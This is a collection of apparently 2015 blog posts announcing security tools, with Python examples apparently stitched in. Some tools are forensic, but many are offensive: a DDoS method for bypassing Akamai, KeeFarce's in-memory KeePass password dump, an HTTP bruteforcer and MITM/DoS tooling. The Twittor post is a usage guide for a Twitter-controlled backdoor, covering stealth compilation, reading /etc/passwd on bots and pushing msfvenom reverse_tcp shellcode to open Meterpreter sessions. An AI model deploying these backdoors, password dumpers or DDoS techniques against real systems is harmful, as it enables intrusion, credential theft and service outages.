
PEMcracker Tool To Crack Encrypted PEM Files



This tool is inspired by pemcrack by Robert Graham. The purpose is to attempt to recover the password for encrypted PEM files while utilizing all the CPU cores.

It still uses high level OpenSSL calls in order to guess the password. As an optimization, instead of continually checking against the PEM on disk, it is loaded into memory in each thread.

bwall@ragnarok:~$ ./pemcracker 
pemcracker 0.1.0
pemcracker

pemcracker 0.1.0 by Brian Wallace (@botnet_hunter)

Usage Example

bwall@ragnarok:~/data/publicprojects/pemcracker$ ./pemcracker test.pem test.dict
Password is komodia for test.pem

Compiling

make

This is somewhat of a short side project, so my apologies for any issues. If there is desire for this project to be further developed, I will try to allocate time.

Alternatives

If you are looking for the fastest possible method of brute forcing PEM files, you may wish to try John the Ripper. Its little-known ssh2john converts PEM files into a format that can be fed to ./john.

Download

~ Wednesday 18 November 2015

0d1n Open Source Web HTTP Fuzzing Tool And Bruteforcer


0d1n is a tool for automating customized attacks against web applications: a web security tool for fuzzing HTTP inputs, written in C with libcurl.

0d1n is an open source web HTTP fuzzing tool and bruteforcer. 0d1n can increase your productivity when testing web parameters, files, directories, forms and more.



You can do:
  • brute force passwords in auth forms
  • directory disclosure (use a PATH list to brute force and find HTTP status codes)
  • test a list of inputs to find SQL Injection and XSS vulnerabilities


To run:

Requires libcurl-dev (or libcurl-devel on RPM-based Linux).

$ git clone https://github.com/CoolerVoid/0d1n/

Install libcurl (Debian/Ubuntu):

$ sudo apt-get install libcurl-dev

or, on an RPM distro:

$ sudo yum install libcurl-devel

$ make

$ ./0d1n


Download

~ Saturday 14 November 2015

AAMO: Another Android Malware Obfuscator



A set of code-obfuscation scripts tailored for Android applications. They assume that the original application can be disassembled into Smali.

Usage

$ mkdir dir_with_apks_to_obfuscate/     # fill the dir with some APKs
$ vim obfuscators/obfuscators.py

Set the obfuscator_to_apply variable to define the list of obfuscators you want to apply.

For example:

obfuscator_to_apply = [
    'Resigned',
    'Alignment',
    'Rebuild',
    'Fields',
    'Debug',
    'Indirections',
    'Defunct',
    'StringEncrypt',
    'Renaming',
    'Reordering',
    'Goto',
    'ArithmeticBranch',
    'Nop',
    'Asset',
    'Intercept',
    'Raw',
    'Resource',
    'Lib',
    'Restring',
    'Manifest',
    'Reflection']

You can choose a subset of obfuscators (recommended).

$ python obfuscators/obfuscators.py

Enjoy your obfuscated APKs.

Obfuscation Operators

Support:

Android specific

  • Repackaging
  • Reassembly
  • Re-alignment


Simple control-flow modifications

  • Junk code insertion
  • Debug symbols stripping
  • Defunct code insertion
  • Unconditional jump insertion


Advanced control-flow modifications

  • Call indirection
  • Code reordering
  • Reflection
  • Opaque predicate insertion


Renaming

  • Non-code files and resource renaming
  • Fields and methods renaming
  • Package renaming


Encryption

  • Resource encryption (asset files)
  • Native code encryption
  • Data encryption (strings)


~ Friday 13 November 2015

Volatility Framework Plugin For Extracting BitLocker FVEK (Full Volume Encryption Key)



Volatility plugin: Bitlocker

This plugin finds and extracts the BitLocker Full Volume Encryption Key (FVEK), which can be used to decrypt BitLocker volumes.

Currently only Windows Vista/7 memory images are supported.

Example use case

Evidence #1: John's computer HDD binary image: John_HDD.dd

Evidence #2: John's computer memory dump: John_Win7SP1x64.raw

1) Determine the offset of encrypted BitLocker volume. In the following example it's the second NTFS partition starting from sector 718848. Note the "-FVE-FS-" signature.

$ mmls John_HDD.dd
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01:  -----   0000000000   0000002047   0000002048   Unallocated
02:  00:00   0000002048   0000718847   0000716800   NTFS (0x07)
03:  00:01   0000718848   0031455231   0030736384   NTFS (0x07)
04:  -----   0031455232   0031457279   0000002048   Unallocated
$
$ hexdump -C -s $((718848*512)) -n 16 John_HDD.dd
15f00000  eb 58 90 2d 46 56 45 2d  46 53 2d 00 02 08 00 00  |.X.-FVE-FS-.....|
15f00010

2) Use the bitlocker plugin to extract the FVEK. The optional --dump-dir argument specifies the directory in which the cipher ID (first 2 bytes) and the FVEK (64 bytes) will be saved.

$ export VOLATILITY_LOCATION=file://./John_Win7SP1x64.raw
$ export VOLATILITY_PROFILE=Win7SP1x64
$
$ python vol.py bitlocker --dump-dir ./keys
Volatility Foundation Volatility Framework 2.5

Cipher: AES-128 + Elephant diffuser (0x8000)
FVEK: 2140c8afcbb835127b3b5b97fdcc8b846b7d97fba0c5a2e9dbfef97e263272fa4543af87702c4cee4252eaaa0b7fdc2a96c54aace6e90642a4bbece8afc430c2
FVEK dumped to: ./keys/0xfa80018fe8c0.fvek

3) Use the extracted FVEK to decrypt the volume with dislocker in FUSE mode.

$ sudo dislocker-fuse -V John_HDD.dd -k ./keys/0xfa80018fe8c0.fvek -o $((718848*512)) -- /mnt/ntfs
$
$ sudo mount -o loop,ro /mnt/ntfs/dislocker-file /mnt/clear
$
$ ls -lh /mnt/clear
total 730M
lrwxrwxrwx 2 root root   60 Jul 14  2009 Documents and Settings -> /mnt/clear/Users
-rwxrwxrwx 1 root root 730M Nov  4 09:39 pagefile.sys
drwxrwxrwx 1 root root    0 Jul 13  2009 PerfLogs
drwxrwxrwx 1 root root 4.0K Nov  4 09:58 ProgramData
drwxrwxrwx 1 root root 4.0K Apr 12  2011 Program Files
drwxrwxrwx 1 root root 4.0K Nov  4 07:01 Program Files (x86)
drwxrwxrwx 1 root root    0 Nov  4 07:04 Recovery
drwxrwxrwx 1 root root    0 Nov  4 09:57 $Recycle.Bin
drwxrwxrwx 1 root root 4.0K Nov  4 07:05 System Volume Information
drwxrwxrwx 1 root root 4.0K Nov  4 09:56 Users
drwxrwxrwx 1 root root  24K Nov  4 09:58 Windows
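Step 1 above locates the encrypted volume by the "-FVE-FS-" signature in its boot sector. The following Python is an added example, not part of the Volatility plugin or of dislocker, that automates that check: it parses mmls output, tests the first sector of every partition for the signature, and returns the byte offset to hand to dislocker's -o option. The disk image and the mmls text it works on are constructed sample data.

```python
import re

SECTOR_SIZE = 512
FVE_SIGNATURE = b"-FVE-FS-"   # OEM name of a BitLocker volume's boot sector (bytes 3..10)

# Matches the body rows of mmls output, e.g.
# "03:  00:01   0000718848   0031455231   0030736384   NTFS (0x07)"
MMLS_ROW = re.compile(r"^\d+:\s+(\S+)\s+(\d+)\s+(\d+)\s+(\d+)\s+(.+?)\s*$")


def parse_mmls(text):
    """Return (slot, start_sector, length_sectors, description) for each mmls row."""
    rows = []
    for line in text.splitlines():
        m = MMLS_ROW.match(line.strip())
        if m:
            slot, start, _end, length, desc = m.groups()
            rows.append((slot, int(start), int(length), desc))
    return rows


def is_bitlocker_volume(image, start_sector):
    """True if the sector at start_sector carries the -FVE-FS- OEM signature."""
    off = start_sector * SECTOR_SIZE
    boot = image[off:off + SECTOR_SIZE]
    return len(boot) == SECTOR_SIZE and boot[3:11] == FVE_SIGNATURE


def find_bitlocker_volumes(image, mmls_text):
    """List (slot, start_sector, byte_offset) for partitions that look BitLocker-encrypted.
    byte_offset is the value to pass to dislocker's -o option."""
    found = []
    for slot, start, length, _desc in parse_mmls(mmls_text):
        if length > 0 and is_bitlocker_volume(image, start):
            found.append((slot, start, start * SECTOR_SIZE))
    return found


def _boot_sector(oem_name):
    """Build a minimal 512-byte boot sector: jump stub, 8-byte OEM name, zero padding."""
    assert len(oem_name) == 8
    return (b"\xeb\x58\x90" + oem_name).ljust(SECTOR_SIZE, b"\x00")


# Constructed sample image: 8 sectors, a plain NTFS volume at sector 2 and a
# BitLocker volume at sector 4 (tiny stand-ins for the partitions in the walkthrough).
SAMPLE_IMAGE = (
    b"\x00" * (2 * SECTOR_SIZE)
    + _boot_sector(b"NTFS    ")
    + b"\x00" * SECTOR_SIZE
    + _boot_sector(FVE_SIGNATURE)
    + b"\x00" * (3 * SECTOR_SIZE)
)

# Constructed mmls output describing SAMPLE_IMAGE.
SAMPLE_MMLS = """\
DOS Partition Table
Offset Sector: 0
Units are in 512-byte sectors

     Slot    Start        End          Length       Description
00:  Meta    0000000000   0000000000   0000000001   Primary Table (#0)
01:  -----   0000000000   0000000001   0000000002   Unallocated
02:  00:00   0000000002   0000000003   0000000002   NTFS (0x07)
03:  00:01   0000000004   0000000007   0000000004   NTFS (0x07)
"""

if __name__ == "__main__":
    for slot, start, offset in find_bitlocker_volumes(SAMPLE_IMAGE, SAMPLE_MMLS):
        print(f"slot {slot}: BitLocker volume at sector {start} (dislocker -o {offset})")
```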


~ Saturday 7 November 2015

Akamai Reflective DDoS Tool



Attack the origin host behind the Akamai Edge hosts and bypass the DDoS protection offered by Akamai services.


How it works?


Based on the research done at NCC:

Akamai boasts around 100,000 edge nodes around the world which offer load balancing, web application firewall, caching etc., to ensure that a minimal amount of requests actually hit the origin web server being protected. However, the issue with caching is that you cannot cache something that is non-deterministic, i.e. a search result. A search that has not been requested before is likely not in the cache, and will result in a cache miss, with the Akamai edge node requesting the resource from the origin server itself.

What this tool does is, provided a list of Akamai edge nodes and a valid cache-missing request, produce multiple requests that hit the origin server via the Akamai edge nodes. As you can imagine, if you had 50 IP addresses under your control, sending requests at around 20 per second, with a 100,000 Akamai edge node list, and a request which results in 10KB hitting the origin, if my calculations are correct, that's around 976MB/ps hitting the origin server, which is a hell of a lot of traffic.

Finding Akamai Edge Nodes

To find Akamai Edge Nodes, the following script has been included:

# python ARDT_Akamai_EdgeNode_Finder.py

This can be edited quite easily to find more; it then saves the IPs automatically.


Download

About the Author:
Christian Galeone is an IT Security Specialist from Italy. He has been acknowledged by the top 5 IT companies, including Yahoo!, Microsoft, AT&T and Sony. He is currently working with HOC as an author of cyber security & VA research articles.

~ Thursday 5 November 2015

KeeFarce: Extract Passwords From KeePass 2.x Database Directly From Memory



KeeFarce allows for the extraction of KeePass 2.x password database information from memory. The cleartext information, including usernames, passwords, notes and URLs, is dumped into a CSV file in %AppData%.

General Design

KeeFarce uses DLL injection to execute code within the context of a running KeePass process. C# code execution is achieved by first injecting an architecture-appropriate bootstrap DLL. This spawns an instance of the .NET runtime within the appropriate app domain, subsequently executing KeeFarceDLL.dll (the main C# payload).

The KeeFarceDLL uses CLRMD to find the necessary object in the KeePass process's heap, locates the pointers to some required sub-objects (using offsets), and uses reflection to call an export method.

Prebuilt Packages

An appropriate build of KeeFarce needs to be used depending on the KeePass target's architecture (32 bit or 64 bit). Archives and their shasums can be found under the 'prebuilt' directory.

Executing

In order to execute on the target host, the following files need to be in the same folder:


  • BootstrapDLL.dll
  • KeeFarce.exe
  • KeeFarceDLL.dll
  • Microsoft.Diagnostic.Runtime.dll


Copy these files across to the target and execute KeeFarce.exe

Building

Open up the KeeFarce.sln with Visual Studio (note: dev was done on Visual Studio 2015) and hit 'build'. The results will be spat out into dist/$architecture. You'll have to copy the KeeFarceDLL.dll files and Microsoft.Diagnostic.Runtime.dll files into the folder before executing, as these are architecture independent.

Compatibility

KeeFarce has been tested on:

KeePass 2.28, 2.29 and 2.30, running on Windows 8.1, both 32 and 64 bit.
This should also work on older Windows machines (Windows 7 with a recent service pack). If you're targeting something other than the above, then testing in a lab environment beforehand is recommended.

Download

~ Saturday 31 October 2015

TOR Released Beta Messenger A Cross-Platform Chat Program Based On Instantbird



Tor Messenger is a cross-platform chat program that aims to be secure by default and sends all of its traffic over Tor. 

It supports a wide variety of transport networks, including Jabber (XMPP), IRC, Google Talk, Facebook Chat, Twitter, Yahoo, and others; enables Off-the-Record (OTR) Messaging automatically; and has an easy-to-use graphical user interface localized into multiple languages.

Instantbird:
A number of messaging clients were considered: Pidgin, Adam Langley's xmpp-client, and Instantbird. Instantbird was the pragmatic choice: its transport protocols are written in a memory-safe language (JavaScript); it has a graphical user interface and already supports many natural languages; and it's a XUL application, which means we can leverage both the code (Tor Launcher) and in-house expertise that the Tor Project has developed working on Tor Browser with Firefox. It also has an active and vibrant software developer community that has been very responsive and understanding of our needs. The main feature it lacked was OTR support, which we have implemented and hope to upstream to the main Instantbird repository for the benefit of all Instantbird (and Thunderbird) users.

Instructions

  • On Linux, extract the bundle(s) and then run: ./start-tor-messenger.desktop
  • On OS X, copy the Tor Messenger application from the disk image to your local disk before running it.
  • On all platforms, Tor Messenger sets the profile folder for Firefox/Instantbird to the installation directory.
  • Note that as a policy, unencrypted one-to-one conversations are not allowed and your messages will not be transmitted if the person you are talking with does not have an OTR-enabled client. You can disable this option in the preferences to allow unencrypted communication but doing so is not recommended.

~ Thursday 29 October 2015

WhatsApp Bot Seed: A Small Python Framework To Create A WhatsApp Bot Like A Web Framework


A small python framework to create a whatsapp bot, with regex-callback message routing (just like a web framework).

What does it do?

  • Basic message handling
  • Automatic media (images and videos) download, and URL screenshots
  • YouTube video downloads, and text to speech
  • Google image and web search
  • Group administration


Installation

  • Install the image-handling system dependencies: bash opt/system-requirements.sh
  • Create a virtualenv and install the requirements: pip install -r opt/requirements.pip
  • Follow the instructions in src/config.py to get the WhatsApp credentials.
  • Then just run the server with: python src/server.py


To create your own views, check the src/router.py, and the src/view/basic_views.py for a simple example.

Download

~ Wednesday 28 October 2015

Sniffly: Sniffing Browser History Using HSTS And CSP


Sniffly Trick For Browser Fingerprinting. Sniffing browser history using HSTS + CSP.

Sniffly is an attack that abuses HTTP Strict Transport Security and Content Security Policy to allow arbitrary websites to sniff a user's browsing history. It has been tested in Firefox and Chrome.

How it works

I recommend reading the inline comments in src/index.js to understand how Sniffly does a timing attack in both FF and Chrome without polluting the local HSTS store. tl;dr version:


  1. User visits Sniffly page
  2. Browser attempts to load images from various HSTS domains over HTTP
  3. Sniffly sets a CSP policy that restricts images to HTTP, so image sources are blocked before they are redirected to HTTPS. This is crucial! If the browser completes a request to the HTTPS site, then it will receive the HSTS pin, and the attack will no longer work when the user visits Sniffly.
  4. When an image gets blocked by CSP, its onerror handler is called. In this case, the onerror handler does some fancy tricks to time how long it took for the image to be redirected from HTTP to HTTPS. If this time is on the order of a millisecond, it was an HSTS redirect (no network request was made), which means the user has visited the image's domain before. If it's on the order of 100 milliseconds, then a network request probably occurred, meaning that the user hasn't visited the image's domain.

Finding HSTS hosts

To scrape an included list of sites (util/strict-transport-security.txt, courtesy Scott Helme) to determine which hosts send HSTS headers, do:

$ cd util
$ ./run.sh > results.log

where 1 batch is 100 sites. You can override util/strict-transport-security.txt with a different list, such as the full Alexa Top 1M, if you want.

To process and sort the results by max-age, excluding ones with max-age less than 1 day and ones that are preloaded:

$ cd util
$ ./process.py > processed.log

Once that's done, you can copy the hosts from processed.log into src/index.js.

Running sploitz

Visiting file:///path/to/sniffly/src/index.html in Chrome should just work. In Firefox, CSP headers using the <meta> tag are apparently not supported yet, so you need to set up a local webserver to serve the CSP HTTP response header. My Nginx server block looks something like this:

server {
    listen 8081;
    server_name localhost;
    location / {
        root /path/to/sniffly/src;
        add_header Content-Security-Policy "img-src http://*";
        index index.html;
    }
}

Caveats

  • Not supported yet in Safari, IE, or Chrome on iOS.
  • Extensions such as HTTPS Everywhere will mess up results.
  • Doesn't work reliably in Tor Browser since timings are rounded to the nearest 100 milliseconds.
  • Users with a different HSTS preload list (e.g. due to having an older browser) may not see accurate results.

More info available in my ToorCon 2015 slides: https://zyan.scripts.mit.edu/presentations/toorcon2015.pdf.

Demo

Visit http://zyan.scripts.mit.edu/sniffly/ in Firefox/Chrome/Opera with HTTPS Everywhere disabled. If you use an ad blocker, a bunch of advertising domains will probably show up in the "Probably Visited" column (ignore them).

Download

~ Monday 26 October 2015

Let's Encrypt Offers Free SSL Certificates To All Websites



Let's Encrypt your website with a free HTTPS certificate.

Hyper Text Transfer Protocol Secure (HTTPS) is the secure version of HTTP, the protocol over which data is sent between your browser and the website that you are connected to. The 'S' at the end of HTTPS stands for 'Secure'. It means all communications between your browser and the website are encrypted.

According to Let's Encrypt:

We’re pleased to announce that we’ve received cross-signatures from IdenTrust, which means that our certificates are now trusted by all major browsers. This is a significant milestone since it means that visitors to websites using Let’s Encrypt certificates can enjoy a secure browsing experience with no special configuration required.

Both Let’s Encrypt intermediate certificates, Let’s Encrypt Authority X1 and Let’s Encrypt Authority X2, received cross-signatures. Web servers will need to be configured to serve the appropriate cross-signature certificate as part of the trust chain. The Let’s Encrypt client will handle this automatically.

You can see an example of a server using a Let’s Encrypt certificate under a new cross-signed intermediate here.

Vital personal and business information is flowing over the Internet more frequently than ever, and it’s time to encrypt all of it. That’s why we created Let’s Encrypt, and we’re excited to be one big step closer to bringing secure connections to every corner of the Web.

The company will offer free HTTPS certificates by November 2015.

~ Friday 23 October 2015

LiME Linux Memory Extractor


A Loadable Kernel Module (LKM) which allows for volatile memory acquisition from Linux and Linux-based devices, such as Android.

This makes LiME unique as it is the first tool that allows for full memory captures on Android devices. It also minimizes its interaction between user and kernel space processes during acquisition, which allows it to produce memory captures that are more forensically sound than those of other tools designed for Linux memory acquisition.

Table of Contents

  • Features
  • Usage
  • Examples
  • Presentation

Features

  • Full Android memory acquisition
  • Acquisition over network interface
  • Minimal process footprint


Usage

Detailed documentation on LiME's usage and internals can be found in the "doc" directory of the project.

LiME utilizes the insmod command to load the module, passing required arguments for its execution.

insmod ./lime.ko "path=<outfile | tcp:<port>> format=<raw|padded|lime> [dio=<0|1>]"

path (required):   outfile ~ name of file to write to on local system (SD Card)
                   tcp:port ~ network port to communicate over

format (required): raw ~ concatenates all System RAM ranges
                   padded ~ pads all non-System RAM ranges with 0s
                   lime ~ each range prepended with a fixed-size header containing address space info

dio (optional):    1 ~ attempt to enable Direct IO
                   0 ~ default, do not attempt Direct IO

localhostonly (optional):  1 restricts the tcp listener to localhost only, 0 binds on all interfaces (default)

Examples

In this example we use adb to load LiME and then start it with acquisition performed over the network.

$ adb push lime.ko /sdcard/lime.ko
$ adb forward tcp:4444 tcp:4444
$ adb shell
$ su
# insmod /sdcard/lime.ko "path=tcp:4444 format=lime"

Now, on the host machine, we can establish the connection and acquire memory using netcat.

$ nc localhost 4444 > ram.lime

Acquiring to sdcard

# insmod /sdcard/lime.ko "path=/sdcard/ram.lime format=lime"
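The lime format used above wraps each captured RAM range in a fixed 32-byte header: the magic 0x4C694D45, a version (1), the inclusive start and end physical address, and 8 reserved bytes. The following Python parser is an added example, not code from the LiME project, that walks such a capture, validates every header, and reads an arbitrary physical address range with the holes between ranges zero-filled (the view the padded format would give). The capture it parses is constructed sample data produced by its own build_lime helper.

```python
import struct

LIME_MAGIC = 0x4C694D45     # appears as the ASCII bytes "EMiL" at the start of the file
LIME_VERSION = 1
# Per-range header: magic, version, start address, end address (inclusive), 8 reserved bytes
HEADER_FMT = "<IIQQ8s"
HEADER_SIZE = struct.calcsize(HEADER_FMT)   # 32 bytes


def parse_lime(data):
    """Split a lime-format capture into (start, end, payload) tuples, one per RAM range.
    Raises ValueError on a bad magic, unknown version or truncated range."""
    ranges = []
    off = 0
    while off < len(data):
        if off + HEADER_SIZE > len(data):
            raise ValueError(f"truncated header at offset {off}")
        magic, version, start, end, _reserved = struct.unpack_from(HEADER_FMT, data, off)
        if magic != LIME_MAGIC:
            raise ValueError(f"bad magic {magic:#x} at offset {off}")
        if version != LIME_VERSION:
            raise ValueError(f"unsupported LiME header version {version}")
        if end < start:
            raise ValueError(f"range end {end:#x} precedes start {start:#x}")
        off += HEADER_SIZE
        size = end - start + 1
        payload = data[off:off + size]
        if len(payload) != size:
            raise ValueError(f"truncated range {start:#x}-{end:#x}")
        ranges.append((start, end, payload))
        off += size
    return ranges


def read_physical(ranges, paddr, size):
    """Read size bytes at physical address paddr from parsed ranges.
    Addresses outside any captured range read as zeros, mirroring the 'padded' format."""
    out = bytearray()
    addr = paddr
    while len(out) < size:
        for start, end, payload in ranges:
            if start <= addr <= end:
                chunk = payload[addr - start:addr - start + (size - len(out))]
                out += chunk
                addr += len(chunk)
                break
        else:
            out.append(0)   # hole between ranges (device memory, reserved regions)
            addr += 1
    return bytes(out)


def build_lime(segments):
    """Serialise (start, payload) pairs into lime format; used here only to build sample data."""
    out = bytearray()
    for start, payload in segments:
        end = start + len(payload) - 1
        out += struct.pack(HEADER_FMT, LIME_MAGIC, LIME_VERSION, start, end, b"\x00" * 8)
        out += payload
    return bytes(out)


# Constructed sample capture: two small "System RAM" ranges with a hole between them.
SAMPLE_CAPTURE = build_lime([(0x1000, b"A" * 16), (0x2000, b"B" * 8)])

if __name__ == "__main__":
    for start, end, payload in parse_lime(SAMPLE_CAPTURE):
        print(f"range {start:#x}-{end:#x}: {len(payload)} bytes")
    print(read_physical(parse_lime(SAMPLE_CAPTURE), 0x1ffc, 8))
```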


Download

~ Wednesday 21 October 2015

Twittor A Fully Featured Backdoor That Uses Twitter As Command And Control Server



A stealthy Python-based backdoor that uses Twitter (Direct Messages) as a command and control server. This project has been inspired by Gcat, which does the same but using a Gmail account.

Setup

For this to work you need:

  • A Twitter account (Use a dedicated account! Do not use your personal one!)
  • Register an app on Twitter with Read, write, and direct messages Access levels.


Install the dependencies:

$ pip install -r requirements.txt

This repo contains two files:

  • twittor.py, the client
  • implant.py, the actual backdoor to deploy

In both files, edit the access token part and add the ones that you previously generated:

CONSUMER_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

ACCESS_TOKEN = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'
ACCESS_TOKEN_SECRET = 'XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX'

USERNAME = 'XXXXXXXXXXXXXXXXXXXXXXXX'

You're probably going to want to compile implant.py into an executable using PyInstaller. In order to remove the console when compiling with PyInstaller, the flags --noconsole --onefile will help. Just saying.

Usage
In order to run the client, launch the script.

$ python twittor.py

You'll then get into an 'interactive' shell which offers a few commands:

$ help

    refresh - refresh C&C control
    list_bots - list active bots
    list_commands - list executed commands
    !retrieve - retrieve jobid command
    !cmd command - execute the command on the bot
    !shellcode shellcode - load and execute shellcode in memory (Windows only)
    help - print this usage
    exit - exit the client



Once you've deployed the backdoor on a couple of systems, you can check available clients using the list_bots command:

$ list_bots
B7:76:1F:0B:50:B7: Linux-x.x.x-generic-x86_64-with-Ubuntu-14.04-precise
$

The output shows the MAC address, which uniquely identifies the system, along with information about the OS the implant is running on; in this case a Linux box.

Let's issue a command to an implant:

$ !cmd B7:76:1F:0B:50:B7 cat /etc/passwd
[+] Sent command "cat /etc/passwd" with jobid: UMW07r2
$

Here we are telling B7:76:1F:0B:50:B7 to execute cat /etc/passwd; the script then outputs the jobid that we can use to retrieve the output of that command.

Let's get the results!

$ !retrieve UMW07r2
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
(...)

Command to use in that case is !retrieve followed by the jobid from the command.

Refresh results
In order to retrieve new bots/command outputs but also force the client to refresh the results, use the refresh command.

$ refresh
[+] Sending command to retrieve alive bots
[+] Sleeping 10 secs to wait for bots
$

This will send a PING request and wait 10 seconds for them to answer. Direct messages will then be parsed - Bot list will be refreshed but also the command list, including new command outputs.

Retrieve previous commands
As I said earlier, (previous) commands will be retrieved from older direct messages (limit is 200) and you can actually retrieve/see them by using the list_commands command

$ list_commands
8WNzapM: 'uname -a ' on 2C:4C:84:8C:D3:B1
VBQpojP: 'cat /etc/passwd' on 2C:4C:84:8C:D3:B1
9KaVJf6: 'PING' on 2C:4C:84:8C:D3:B1
aCu8jG9: 'ls -al' on 2C:4C:84:8C:D3:B1
8LRtdvh: 'PING' on 2C:4C:84:8C:D3:B1
$

Running shellcode (Windows hosts)
This option might be handy in order to retrieve a meterpreter session and this article becomes really useful.

Generate your meterpreter shellcode, like:

# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.0.0.1 LPORT=3615 -f python
(...)
Payload size: 299 bytes

Extract the shellcode and send it to the specified bot using the !shellcode command!

$ !shellcode 11:22:33:44:55 \xfc\xe8\x82\x00\x00\x00\x60\x89\xe5\x31\xc0\x64\x8b (...)
[+] Sent shellcode with jobid: xdr7mtN
$

There you go!

msf exploit(handler) > exploit

[*] Started reverse handler on 10.0.0.1:3615 
[*] Starting the payload handler...
[*] Sending stage (884270 bytes) to 10.0.0.99
[*] Meterpreter session 1 opened (10.0.0.1:3615 -> 10.0.0.99:49254) at 2015-09-08 10:19:04 -0400

meterpreter > getuid
Server username: WIN-XXXXXXXXX\PaulSec

Contributing and/or questions?
The project is entirely open source and released under the MIT license. I mostly wanted to create a PoC after Twitter decided to remove the 140 characters limit for Direct Messages. A few things should be added, such as encryption (adding AES on top of it). "Messages" use a dictionary data structure and the whole command is only base64 encoded. Fork the project, contribute, submit pull requests, and have fun.

Download

Note: This is for educational purposes only.

~ Monday 12 October 2015

This Female Hacker SexyCyborg Can Break The Security With Her Shoe Heels



Her shoes hide equipment for hacking into Wi-Fi networks: with the hidden Wi-Fi testing tools she can secretly sniff computers and steal data remotely.

How did she get the idea?

She said:

"My typical clothing does not leave room to hide anything, which is all the more reason they would not be suspicious of me. With my shadowless shoes I distract the target with my… upper body and they don't see the real danger on my feet."

"I've been watching the TV show 'Mr. Robot' and while I know not all of it is accurate some of it is and it got me curious. I'm already pretty comfortable with command line and remote server administration from my web development work, and it turns out a lot of 'hacking' tools are just testing tools any sensible IT professional would use, just without a GUI.

So I spent the month hitting the books (well, web pages) watching lots of videos and learning a bit about information security and penetration testing (I wonder how many idiot jokes that phrase is going to cause…). I still don't know much, but I know a tiny bit more than I did. Enough to ask people who know more than me the right questions, and enough for a fun project.

So I devised the Wu Ying Shoes (无影鞋)! Penetration Testing Platform Heels! 'Wu Ying' means 'shadowless'."



What she can carry inside the sandal heels:

  • USB keylogger
  • Retractable Ethernet cable for OpenWRT router
  • Lock-picking set.


Watch the video: how does she break the security?


~ Wednesday 7 October 2015

MEMSCAN A Memory Scanning Tool For A Specific Sequence of Bytes




A memory scanning tool which uses mach_vm* to either dump memory or look for a specific sequence of bytes.
To build MEMSCAN, you will need to have Theos installed. Well, you don't really need it, but it makes life easier.

Once Theos is installed, simply navigate to the MEMSCAN folder in terminal and run:

make package install

Usage

Dumping the memory of a process


  1. Obtain the target process PID, using ps.
  2. Provide the PID to memscan:

./memscan -p <pid> -d

Finding objects in memory

Open your target app or process in a disassembler, grab first ~16 bytes (customise this number as you will) of the method you want to hook and these bytes will be your "signature".

Write the signature to a file, make sure to encode the bytes like so:

echo -n -e '\x55\x48\x89\xE5\xB8\x15\x00\x00\x00\x5D' > needle

Run the scanner against the target process. It will locate the signature in memory and print its address. The signature has to be passed in as bytes, not a literal string, so use the scanner as shown:

./memscan -p <pid> -s <signature file>

e.g:

./memscan -p 1234 -s ./needle

MEMSCAN should then print the address where the needle is located in memory.


Download

~ Monday 5 October 2015

BLUTO For DNS Recon, Brute Forcer and DNS Zone Transfer


Bluto: DNS recon, subdomain brute forcing and zone transfers against a target domain.

The target domain is queried for MX and NS records. Sub-domains are passively gathered via NetCraft. The target domain's NS records are each queried for potential zone transfers. If none of them gives up their spinach, Bluto will brute force subdomains using parallel sub-processing on the top 20000 entries of 'The Alexa Top 1 Million subdomains'.

NetCraft results are presented individually and are then compared to the brute force results; any duplicates are removed and particularly interesting results are highlighted.

Bluto requires various other dependencies. So to make things as easy as possible, pip is used for the installation. This does mean you will need to have pip installed prior to attempting the Bluto install.

Pip Install Instructions

Note: To test whether pip is already installed, execute:

pip -V

(1) Mac and Kali users can simply use the following command to download and install pip.

curl https://bootstrap.pypa.io/get-pip.py -o - | python

Bluto Install Instructions

(1) Once pip has successfully downloaded and installed, we can install Bluto:

pip install git+git://github.com/RandomStorm/Bluto

(2) You should now be able to execute 'bluto.py' from any working directory in any terminal.

bluto.py

Upgrade Instructions

(1) The upgrade process is as simple as:

pip install git+git://github.com/RandomStorm/Bluto --upgrade


Download

~ Wednesday 30 September 2015

Thug: A Tool For Python Low-Interaction Honeyclient



Thug is a Python low-interaction honeyclient aimed at mimicking the behavior of a web browser in order to detect and emulate malicious content.

The number of client-side attacks has grown significantly in the past few years shifting focus on poorly protected vulnerable clients. Just as the most known honeypot technologies enable research into server-side attacks, honeyclients allow the study of client-side attacks.

A complement to honeypots, a honeyclient is a tool designed to mimic the behavior of a user-driven network client application, such as a web browser, and be exploited by an attacker's content.


Download


How To Test Security in IPv4 and IPv6 Data Networks?


Evil Foca is a tool for security pentesters and auditors whose purpose is to test security in IPv4 and IPv6 data networks.

The IPv4 address space is 32 bits, which yields about 4 billion addresses. IPv6 offers a much larger address space: its addresses are 128 bits long, resulting in an address space of 340 undecillion addresses.


In addition, IPv6 provides other technical benefits, particularly, it permits hierarchical address allocation methods that facilitate route aggregation across the Internet, and thus limit the expansion of routing tables. The use of multicast addressing is expanded and simplified, and provides additional optimization for the delivery of services. Device mobility, security, and configuration aspects have been considered in the design of the protocol.

The tool is capable of carrying out various attacks such as:


  • MITM over IPv4 networks with ARP Spoofing and DHCP ACK Injection.
  • MITM on IPv6 networks with Neighbor Advertisement Spoofing, SLAAC attack, fake DHCPv6.
  • DoS (Denial of Service) on IPv4 networks with ARP Spoofing.
